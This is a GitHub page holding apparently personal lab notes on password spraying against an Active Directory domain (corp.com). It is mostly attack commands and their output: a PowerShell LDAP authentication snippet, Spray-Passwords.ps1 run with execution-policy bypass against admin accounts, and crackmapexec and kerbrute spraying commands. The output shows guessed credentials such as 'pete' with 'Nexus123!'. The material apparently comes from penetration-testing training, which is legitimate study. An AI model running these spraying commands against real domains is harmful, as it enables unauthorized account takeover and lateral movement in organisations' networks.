-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathPASSWORD-SPRAYING-DOMAIN.txt
69 lines (40 loc) · 2.25 KB
/
PASSWORD-SPRAYING-DOMAIN.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
PASSWORDS ATTACK
CLIENT75. We can connect to the system with the password HenchmanPutridBonbon11 via RDP.
powershell
net accounts
##Spray-Passwords.ps1
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")
Spray-Passwords.ps1##
#we could use this technique to create a PowerShell script that enumerates all users and performs authentications according to the #Lockout threshold and Lockout observation window.
cd C:\Tools
powershell -ep bypass
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'
Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'
cat users.txt
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
type .\usernames.txt
pete
dave
jen
.\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
192.168.219.70
cme smb 192.168.219.75 -u dave -p 'Flowers1' -d corp.com --continue-on-success
cat users.txt
cme smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
cme smb 192.168.219.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
##Let's use the Windows version in C:\Tools to perform this attack. To conduct password spraying, we need to specify the passwordspray command along with a list of usernames and the password to spray. We'll also need to enter the domain corp.com as an argument for -d. As previously, we'll create a file named usernames.txt in C:\Tools containing the usernames pete, dave, and jen.
.\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
cme smb ips -u pete -p 'Nexus123!' -d corp.com --continue-on-success